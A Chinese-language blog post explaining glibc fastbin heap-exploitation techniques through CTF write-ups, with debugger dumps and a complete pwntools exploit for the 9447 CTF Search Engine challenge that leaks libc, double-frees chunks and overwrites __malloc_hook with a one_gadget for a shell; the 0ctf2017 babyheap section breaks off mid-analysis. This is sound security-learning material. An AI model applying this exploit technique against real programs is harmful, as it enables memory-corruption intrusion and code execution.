
 <!DOCTYPE HTML>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  
    <title>Fastbin Attack | p1Kk&#39;s World!</title>
    <meta name="viewport" content="width=device-width, initial-scale=1,user-scalable=no">
    
    <meta name="author" content="p1Kk">
    

    
    <meta name="description" content="首先需要了解：  fastbin大小&amp;lt;=64B（32位），fastbins中的chunk不改变它的prev_inuse标志，也就无法被合并 首块double free检查，当一个chunk被free进fastbin前，会看看链表的第一个chunk【main_arena直接指向的块】是不是该chunk，如果是，说明double free了就报错，而对于链表后面的块，并没有进行验证。  fast">
<meta name="keywords" content="pwn,堆,笔记">
<meta property="og:type" content="article">
<meta property="og:title" content="Fastbin Attack">
<meta property="og:url" content="p1Kk.github.io/2019/11/10/fastbin attack/fastbin/index.html">
<meta property="og:site_name" content="p1Kk&#39;s World!">
<meta property="og:description" content="首先需要了解：  fastbin大小&amp;lt;=64B（32位），fastbins中的chunk不改变它的prev_inuse标志，也就无法被合并 首块double free检查，当一个chunk被free进fastbin前，会看看链表的第一个chunk【main_arena直接指向的块】是不是该chunk，如果是，说明double free了就报错，而对于链表后面的块，并没有进行验证。  fast">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/aa.png">
<meta property="og:image" content="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/hole.png">
<meta property="og:image" content="https://i.loli.net/2019/12/08/fEUuPnCHBwFDQyo.png">
<meta property="og:image" content="https://i.loli.net/2019/12/08/I4dukS78nHCWVLQ.png">
<meta property="og:image" content="https://i.loli.net/2019/12/08/YGCQN31sEvFMtpU.png">
<meta property="og:image" content="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/_GJRBW~UDI64RTJ%60AG%60%60BXW.png">
<meta property="og:updated_time" content="2020-04-07T13:50:05.001Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Fastbin Attack">
<meta name="twitter:description" content="首先需要了解：  fastbin大小&amp;lt;=64B（32位），fastbins中的chunk不改变它的prev_inuse标志，也就无法被合并 首块double free检查，当一个chunk被free进fastbin前，会看看链表的第一个chunk【main_arena直接指向的块】是不是该chunk，如果是，说明double free了就报错，而对于链表后面的块，并没有进行验证。  fast">
<meta name="twitter:image" content="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/aa.png">

    
    <link rel="alternative" href="atom.xml" title="p1Kk&#39;s World!" type="application/atom+xml">
    
    
    <link rel="icon" href="/img/site.jpg">
    
    
    <link rel="apple-touch-icon" href="/img/head.png">
    <link rel="apple-touch-icon-precomposed" href="/img/head.png">
    
    <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <header>
      
<div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo2.jpg" alt="p1Kk&#39;s World!" title="p1Kk&#39;s World!"/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="p1Kk&#39;s World!">p1Kk&#39;s World!</a></h1>
				<h2 class="blog-motto">艺无止境，功不唐捐。</h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					<ul>
					 
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
						<li><a href="/about">About</a></li>
					
						<li><a href="/tags">Tags</a></li>
					
						<li><a href="/categories">Categories</a></li>
					
					<li>
 					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="search" id="search" name="q" autocomplete="off" maxlength="20" placeholder="Search" />
						<input type="hidden" name="q" value="site:p1Kk.github.io">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>
    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
	
	  <article itemprop="articleBody"> 
		  <header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2019/11/10/fastbin attack/fastbin/" title="Fastbin Attack" itemprop="url">Fastbin Attack</a>
  </h1>
  <p class="article-author">By
       
		<a href="/about" title="p1Kk" target="_blank" itemprop="author">p1Kk</a>
		
  <p class="article-time">
    <time datetime="2019-11-09T16:00:00.000Z" itemprop="datePublished"> Published 2019-11-10</time>
    
  </p>
</header>
	  <div class="article-content">
		  
		  <div id="toc" class="toc-article">
			  <strong class="toc-title">Contents</strong>
		  
			  <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#double-free"><span class="toc-number">1.</span> <span class="toc-text">double free</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#house-of-Spirit"><span class="toc-number">2.</span> <span class="toc-text">house of Spirit</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Alloc-to-Stack"><span class="toc-number">3.</span> <span class="toc-text">Alloc to Stack</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Arbitrary-Alloc"><span class="toc-number">4.</span> <span class="toc-text">Arbitrary Alloc</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#例子"><span class="toc-number">5.</span> <span class="toc-text">例子</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#2015-9447-CTF-Search-Engine"><span class="toc-number">5.1.</span> <span class="toc-text">2015 9447 CTF : Search Engine</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#分析"><span class="toc-number">5.1.1.</span> <span class="toc-text">分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp"><span class="toc-number">5.1.2.</span> <span class="toc-text">exp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0ctf2017-babyheap"><span class="toc-number">5.2.</span> <span class="toc-text">0ctf2017 babyheap</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#分析1"><span class="toc-number">5.2.1.</span> <span class="toc-text">分析1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp1"><span class="toc-number">5.2.2.</span> <span class="toc-text">exp1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#分析2"><span class="toc-number">5.2.3.</span> <span class="toc-text">分析2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp2"><span class="toc-number">5.2.4.</span> <span class="toc-text">exp2</span></a></li></ol></li></ol></li></ol>
		  
		  </div>
		  
		  <p>首先需要了解：</p>
<ol>
<li>fastbin大小&lt;=64B（32位），fastbins中的chunk不改变它的<code>prev_inuse</code>标志，也就无法被合并</li>
<li>首块double free检查，当一个chunk被free进fastbin前，会看看链表的第一个chunk【main_arena直接指向的块】是不是该chunk，如果是，说明double free了就报错，而对于链表后面的块，并没有进行验证。</li>
</ol>
<p>fastbin attack就是fastbin类型的chunk中存在 <strong>堆溢出</strong>， <strong>uaf</strong> 等漏洞</p>
<p>用过一定手段篡改某堆块的fd指向一块目标内存（当然其对应size位置的值要合法），当我们malloc到此堆块后再malloc一次，自然就把目标内存分配到了，就可以对这块目标内存为所欲为了，达到任意地址写任意值的效果（可以是关键数据也可以是函数指针）</p>
<h1 id="double-free"><a href="#double-free" class="headerlink" title="double free"></a>double free</h1><p>顾名思义，double free就是指fastbin的chunk被多次释放</p>
<h1 id="house-of-Spirit"><a href="#house-of-Spirit" class="headerlink" title="house of Spirit"></a>house of Spirit</h1><p>该技术的核心在于在目标位置处伪造 fastbin chunk，并将其释放到对应的fastbin链表中，从而达到分配指定地址的 chunk 的目的。</p>
<ul>
<li>fake chunk 的 ISMMAP 位不能为 1，因为 free 时，如果是 mmap 的 chunk，会单独处理。</li>
<li>fake chunk 地址需要对齐， MALLOC_ALIGN_MASK</li>
<li>fake chunk 的 size 大小需要满足对应的 fastbin 的需求，同时也得对齐。</li>
<li>fake chunk 的 next chunk 的大小不能小于 2 * SIZE_SZ，同时也不能大于av-&gt;system_mem 。</li>
<li>fake chunk 对应的 fastbin 链表头部不能是该 fake chunk，即不能构成 double free 的情况。</li>
</ul>
<h1 id="Alloc-to-Stack"><a href="#Alloc-to-Stack" class="headerlink" title="Alloc to Stack"></a>Alloc to Stack</h1><p>该技术的核心点在于劫持 fastbin 链表中 chunk 的 fd 指针，把 fd 指针指向我们想要分配的栈上，当然同时需要栈上存在有满足条件的 size 值，从而把 fastbin chunk 分配到栈中，控制返回地址等关键数据。</p>
<h1 id="Arbitrary-Alloc"><a href="#Arbitrary-Alloc" class="headerlink" title="Arbitrary Alloc"></a>Arbitrary Alloc</h1><p>与<code>Alloc to Stack</code>不尽相同，但它范围更广。只要满足目标地址存在合法的 size 域（这个 size 域是构造的，还是自然存在的都无妨），我们可以把 chunk 分配到任意的可写内存中，比如 bss、heap、data、stack 等等。<br>比如利用<code>字节错位</code>等方法来绕过 size 域的检验，实现任意地址分配 chunk，最后的效果也就相当于任意地址写任意值。</p>
<h1 id="例子"><a href="#例子" class="headerlink" title="例子"></a>例子</h1><h2 id="2015-9447-CTF-Search-Engine"><a href="#2015-9447-CTF-Search-Engine" class="headerlink" title="2015 9447 CTF : Search Engine"></a><a href="https://github.com/ctf-wiki/ctf-challenges/blob/master/pwn/heap/fastbin-attack/2015_9447ctf_search-engine/search" target="_blank" rel="noopener">2015 9447 CTF : Search Engine</a></h2><p>怎么说呢，这个题对我来说难度有点大</p>
<h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><p>首先要搞懂程序流程</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">menu</span><br><span class="line">1: Search with a word</span><br><span class="line">2: Index a sentence</span><br><span class="line">3: Quit</span><br></pre></td></tr></table></figure>

<p>首先 2 写入句子，首先输入句子长度，且句子是由单词构成，每个单词后面都要加 空格 才能检测到，所以长度是带空格的长度<br>1 查找单词，输入单词长度和单词，查找当前所有的句子中含有这个单词的句子，显示一条并询问是否删除，再往下显示<br><img src="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/aa.png" alt></p>
<p>我们输入句子长度为8的句子“how are ”</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">0x603430 FASTBIN &#123;</span><br><span class="line">  prev_size = 0, </span><br><span class="line">  size = 49, </span><br><span class="line">  fd = 0x603420, </span><br><span class="line">  bk = 0x3, </span><br><span class="line">  fd_nextsize = 0x603420, </span><br><span class="line">  bk_nextsize = 0x8</span><br><span class="line">&#125;</span><br><span class="line">0x603460 FASTBIN &#123;</span><br><span class="line">  prev_size = 0, </span><br><span class="line">  size = 49, </span><br><span class="line">  fd = 0x603424, </span><br><span class="line">  bk = 0x3, </span><br><span class="line">  fd_nextsize = 0x603420, </span><br><span class="line">  bk_nextsize = 0x8</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">pwndbg&gt; x/20gx 0x603410</span><br><span class="line">0x603410:	0x0000000000000000	0x0000000000000021</span><br><span class="line">0x603420:	0x2065726120776f68	0x0000000000000000      ==&gt;sentence</span><br><span class="line">0x603430:	0x0000000000000000	0x0000000000000031      ==&gt;申请了0x30大小的chunk存放word</span><br><span class="line">0x603440:	0x0000000000603420	0x0000000000000003      ==&gt;word1 how 的地址 长度</span><br><span class="line">0x603450:	0x0000000000603420	0x0000000000000008      ==&gt;sentence 的地址 长度</span><br><span class="line">0x603460:	0x0000000000000000	0x0000000000000031      ==&gt;同上</span><br><span class="line">0x603470:	0x0000000000603424	0x0000000000000003      ==&gt;word2 are 的地址 长度</span><br><span class="line">0x603480:	0x0000000000603420	0x0000000000000008      ==&gt;sentence 的地址 长度</span><br><span class="line">0x603490:	0x0000000000603440	0x0000000000000031</span><br><span class="line">0x6034a0:	0x00000000006034d0	0x0000000000000003</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/p1Kk/blogImg/master/Picture/hole.png" alt="漏洞点"></p>
<ol>
<li><p>我们可以先创建一个unsorted bin大小的chunk，然后释放，该chunk将被填0，但是没有被设置为NULL。列表中只有者这一个 unsortedbin，释放后它的fd bk都将指向自己<br>由于查找单词的时候没有限制’\x00’，所以通过’\x00’查找到最后，同时也没有截断，就可以连带打印出unsortedbin地址，libc_base = unsorted_addr - 0x3c4b78。<br>main_arena_offset = 0x3c4b20。这里libc里main_arena偏移在<code>malloc_trim</code>函数里找到。</p>
</li>
<li><p>由于存在<code>double free</code>漏洞<br>首先申请大小相同的 a b c三块，然后依次释放 c b a(因为搜索的顺序跟添加顺序相反)。此时fast bin里 a-&gt;b-&gt;c-&gt;null，然后再次释放b就会导致 b-&gt;a-&gt;b-&gt;a…<br>这里注意的就是 在再次释放b的时候，因为c的fd指向null所以不进入搜索，b第一个进入搜索，所以只再次释放第一个结果，其余的都不再释放。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; fastbin</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x2105150 ◂— 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x2105010 —▸ 0x2105170 —▸ 0x2105240 ◂— 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">=======================</span><br><span class="line">double free之后</span><br><span class="line">=======================</span><br><span class="line">pwndbg&gt; fastbin</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x2105150 ◂— 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x2105170 —▸ 0x2105010 ◂— 0x2105170</span><br><span class="line">0x80: 0x0</span><br></pre></td></tr></table></figure>
</li>
<li><p>改写<code>__malloc_hook</code>为<code>one_gadget</code>。在malloc的时候，不会检查地址的对齐，只会检查size的大小是否符合。所以构造我们的堆块大小为0x60，这是因为(0x60+8)对齐16大小为0x70在fastbin[5]里，而0x7f刚好也对应着fastbin[5]。64位计算方法为 0x7f&gt;&gt;4 -2。而在main_arenahook处，很多地址都以0x7f开头，可以利用字节错位来构造假的size。（使用pwndbg的<code>find_fake_fast</code>）<br>把前面申请的chunk a b c重新使用后，再次调用malloc时，就会跳转到one_gadget执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; print (void*)&amp;main_arena</span><br><span class="line">$2 = (void *) 0x7f4be2dc8b20 &lt;main_arena&gt;</span><br><span class="line"></span><br><span class="line">pwndbg&gt; print (void*)&amp;__malloc_hook</span><br><span class="line">$3 = (void *) 0x7f4be2dc8b10 &lt;__malloc_hook&gt;</span><br><span class="line"></span><br><span class="line">pwndbg&gt; x/10gx 0x7f4be2dc8b10</span><br><span class="line">0x7f4be2dc8b10 &lt;__malloc_hook&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7f4be2dc8b20 &lt;main_arena&gt;:	0x0000000000000000	0x00000000010f5150</span><br><span class="line">0x7f4be2dc8b30 &lt;main_arena+16&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7f4be2dc8b40 &lt;main_arena+32&gt;:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x7f4be2dc8b50 &lt;main_arena+48&gt;:	0x0000000000000000	0x00000000010f5010</span><br><span class="line"></span><br><span class="line">pwndbg&gt; find_fake_fast 0x7f4be2dc8b10 0x7f</span><br><span class="line">FAKE CHUNKS</span><br><span class="line">0x7f4be2dc8aed FAKE PREV_INUSE IS_MMAPED NON_MAIN_ARENA &#123;</span><br><span class="line">  prev_size = 5468175281376198656, </span><br><span class="line">  size = 127, </span><br><span class="line">  fd = 0x4be2a89e20000000, </span><br><span class="line">  bk = 0x4be2a89a0000007f, </span><br><span class="line">  fd_nextsize = 0x7f, </span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">pwndbg&gt; print /x 0x7f4be2dc8b10-0x7f4be2dc8aed      # __malloc_hook - fake_chunk_addr</span><br><span class="line">$4 = 0x23                                           # padding = 0x23 - 0x10</span><br><span class="line"></span><br><span class="line">pwndbg&gt; print /x 0x7f4be2dc8b20-0x7f4be2dc8aed      # main_arena - fake_chunk_addr</span><br><span class="line">$5 = 0x33</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">#!usr/bin/python</span><br><span class="line">from pwn import *</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line"></span><br><span class="line">binary = &quot;./search&quot;</span><br><span class="line">ip = &quot;&quot;</span><br><span class="line">port = 0</span><br><span class="line">elf = ELF(binary)</span><br><span class="line"></span><br><span class="line">def menu(choice):</span><br><span class="line">	io.sendlineafter(&quot;Quit\n&quot;, str(choice))</span><br><span class="line"></span><br><span class="line">def search(word):</span><br><span class="line">	menu(1)</span><br><span class="line">	io.sendlineafter(&quot;size:\n&quot;, str(len(word)))</span><br><span class="line">	io.sendafter(&quot;word:\n&quot;, word)</span><br><span class="line"></span><br><span class="line">def delete(yn):</span><br><span class="line">	io.recvuntil(&quot;(y/n)?\n&quot;)</span><br><span class="line">	io.sendline(yn)</span><br><span class="line"></span><br><span class="line">def index(sent):</span><br><span class="line">	menu(2)</span><br><span class="line">	io.sendlineafter(&quot;size:\n&quot;, str(len(sent)))</span><br><span class="line">	io.sendafter(&quot;sentence:\n&quot;, sent)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def pwn(ip, port, debug):</span><br><span class="line">	global io</span><br><span class="line">	if debug == 1:</span><br><span class="line">		io = process(binary)</span><br><span class="line">		libc = ELF(&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;)	</span><br><span class="line">	else:</span><br><span class="line">		io = remote(ip, port)</span><br><span class="line">		libc = 0</span><br><span class="line">	</span><br><span class="line">	sent = &apos;a&apos;*0x99 + &apos; b &apos;</span><br><span class="line">	index(sent)</span><br><span class="line">	search(&apos;b&apos;)</span><br><span class="line">	delete(&apos;y&apos;)</span><br><span class="line">	search(&apos;\x00&apos;)</span><br><span class="line">	io.recvuntil(&quot;Found &quot; + str(len(sent)) + &quot;: &quot;)</span><br><span class="line">	unsorted_addr = u64(io.recv(8))</span><br><span class="line">	delete(&apos;n&apos;)</span><br><span class="line">	print &quot;unsorted_addr = &quot; +hex(unsorted_addr)</span><br><span class="line">	libc_base = unsorted_addr - 0x3c4b78</span><br><span class="line">	main_arena_offset = 0x3c4b20</span><br><span class="line">	main_arena = libc_base + main_arena_offset</span><br><span class="line">	one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]</span><br><span class="line">	one_gadget = libc_base + one_gadget[3]</span><br><span class="line">	</span><br><span class="line">	sent = &apos;a&apos; * 0x5d + &apos; c &apos;		# 1</span><br><span class="line">	index(sent)</span><br><span class="line">	sent = &apos;a&apos; * 0x5d + &apos; c &apos;		# 2</span><br><span class="line">	index(sent)</span><br><span class="line">	sent = &apos;a&apos; * 0x5d + &apos; c &apos;		# 3</span><br><span class="line">	index(sent)</span><br><span class="line">	</span><br><span class="line">	search(&apos;c&apos;)</span><br><span class="line">	delete(&apos;y&apos;)</span><br><span class="line">	delete(&apos;y&apos;)</span><br><span class="line">	delete(&apos;y&apos;)		</span><br><span class="line">	# main_arena -&gt; 1 -&gt; 2 -&gt; 3 -&gt; NULL</span><br><span class="line">	search(&apos;\x00&apos;)</span><br><span class="line">	delete(&apos;y&apos;)</span><br><span class="line">	delete(&apos;n&apos;)</span><br><span class="line">	delete(&apos;n&apos;)		</span><br><span class="line">	# main_arena -&gt; 2 -&gt; 1 -&gt; 2 -&gt; 1 -&gt; ...</span><br><span class="line">	fake_chunk_addr = main_arena - 0x33</span><br><span class="line">	index(p64(fake_chunk_addr).ljust(0x60, &apos;a&apos;))</span><br><span class="line">	index(&apos;b&apos; * 0x60)</span><br><span class="line">	index(&apos;c&apos; * 0x60)</span><br><span class="line">	sent = &apos;a&apos; * 0x13 + p64(one_gadget)</span><br><span class="line">	sent = sent.ljust(0x60, &apos;a&apos;)</span><br><span class="line">	# gdb.attach(io)</span><br><span class="line">	index(sent)</span><br><span class="line">		</span><br><span class="line">	io.interactive()</span><br><span class="line"></span><br><span class="line">if __name__ == &apos;__main__&apos;:</span><br><span class="line">	pwn(ip, port, 1)</span><br></pre></td></tr></table></figure>

<p>做完感觉挺简单的…</p>
<h2 id="0ctf2017-babyheap"><a href="#0ctf2017-babyheap" class="headerlink" title="0ctf2017 babyheap"></a>0ctf2017 babyheap</h2><p>保护全开<br>功能：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1. Allocate</span><br><span class="line">2. Fill</span><br><span class="line">3. Free</span><br><span class="line">4. Dump</span><br><span class="line">5. Exit</span><br></pre></td></tr></table></figure>

<p>calloc的size是在<code>Allocate</code>中输入的。而<code>Fill</code>时size是重新输入的，可以造成堆溢出。<br>（内存分配函数是calloc而不是malloc，calloc分配chunk时会对内存区域进行置空，也就是说之前的fd和bk字段都会被置为0）<br>先关闭PIE方便调试</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo sh -c &quot;echo 0 &gt; /proc/sys/kernel/randomize_va_space&quot;</span><br></pre></td></tr></table></figure>

<p>在gdb中使用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">skip function alarm</span><br></pre></td></tr></table></figure>

<p>跳过alarm函数，方便调试，但是每次调试都需要执行这么一句。<br>或者就通过patch二进制文件删除alarm函数</p>
<h3 id="分析1"><a href="#分析1" class="headerlink" title="分析1"></a>分析1</h3><p>alloc四个fast chunk，一个small chunk</p>
<p>先释放1，再释放2</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/40gx 0x555555757000</span><br><span class="line">0x555555757000:	0x0000000000000000	0x0000000000000021 ==&gt;0</span><br><span class="line">0x555555757010:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x555555757020:	0x0000000000000000	0x0000000000000021 ==&gt;1</span><br><span class="line">0x555555757030:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x555555757040:	0x0000000000000000	0x0000000000000021 ==&gt;2</span><br><span class="line">0x555555757050:	0x0000555555757020	0x0000000000000000 ==&gt;后入先出，所以chunk2的fd指向chunk1</span><br><span class="line">0x555555757060:	0x0000000000000000	0x0000000000000021 ==&gt;3</span><br><span class="line">0x555555757070:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x555555757080:	0x0000000000000000	0x0000000000000091 ==&gt;4</span><br><span class="line">0x555555757090:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5555557570a0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5555557570b0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5555557570c0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5555557570d0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5555557570e0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5555557570f0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x555555757100:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x555555757110:	0x0000000000000000	0x0000000000020ef1</span><br><span class="line">0x555555757120:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x555555757130:	0x0000000000000000	0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>接下来，通过堆溢出漏洞，将chunk2的fd指针第一个字节修改为0x80指向chunk4，由于1， 2都被free，所以通过chunk0进行修改<br>因为申请fast chunk时会检测chunk_size和chunk_index是否匹配【index计算方式为：(chunk size) &gt;&gt; (SIZE_SZ == 8 ? 4 : 3) – 2，在64位平台上SIZE_SZ为8】，所以我们还需要修改chunk4的size位为0x21</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">alloc(0x10) ==&gt;得到原来chunk2空间</span><br><span class="line">alloc(0x10) ==&gt;得到chunk4空间，可以控制</span><br></pre></td></tr></table></figure>

<p>前提：当内存中只有一个small chunk的时候，且该chunk处于申请空间的内存最高位，那么释放后的fd bk并不会指向libc中的某处<br><img src="https://i.loli.net/2019/12/08/fEUuPnCHBwFDQyo.png" alt="FALSE"><br>所以我们应该再alloc一个small chunk，使chunk4不在最高位<br>再将chunk4的size位修复，使chunk4被释放后，fd bk指向libc某处<br><img src="https://i.loli.net/2019/12/08/I4dukS78nHCWVLQ.png" alt="TRUE"><br>这时候打印chunk2就可以得到top chunk，它与main_arena偏移固定，为0x3c4b78，减去它即得到libc基地址（在fastbin为空时，unsortbin的fd和bk指向自身main_arena）<br><img src="https://i.loli.net/2019/12/08/YGCQN31sEvFMtpU.png" alt></p>
<p>又，malloc中不为空时，就执行它指向的函数，如果我们将指针改为shell函数，那么调用malloc就会触发getshell</p>
